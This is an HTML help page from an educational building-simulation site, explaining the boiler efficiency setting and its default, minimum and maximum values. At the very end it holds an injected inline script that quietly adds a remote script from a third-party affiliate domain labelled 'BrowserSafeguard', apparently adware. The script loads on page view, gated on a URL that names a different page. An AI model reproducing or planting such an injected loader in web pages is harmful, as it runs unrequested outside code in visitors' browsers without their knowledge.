﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>BOILER EFFICIENCY</h1>
<h3>Associated System: Boiler</h3>
<div class="graphic"> <img src="../HVAC Rooftop/Boiler.png" alt=""/ ></div>    
<p>This parameter sets the boiler efficiency. Boiler efficiency is a ratio of the Boilers Thermal output (the heating supplied to a system medium such as hot water or steam) to the boiler's fuel usage (the energy input.)   Essentially this value determines how effectively a boiler converts fuel (ie natural gas or electricity) to useable heating energy (ie. hot water or steam).</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Raising the boiler efficiency will reduce the fueldemand of the boiler over time. Alternatively, lowering this value will cause the boiler to increase fuel consumption.</p>      
<h4>The value of this variable can not be adjusted during simulation run-time. It may be adjusted before or after a simulation.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 90</li>
<li><label>Minimum:</label> 0</li>
<li><label>Maximum:</label> 100</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> %</li>
<li><label>SI Units:</label> %</li>      </ul>
<h2>Related Items: </h2>
<ul></ul>
<h2>Links:</h2>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Boiler" target="_blank">http://en.wikipedia.org/wiki/Boiler</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
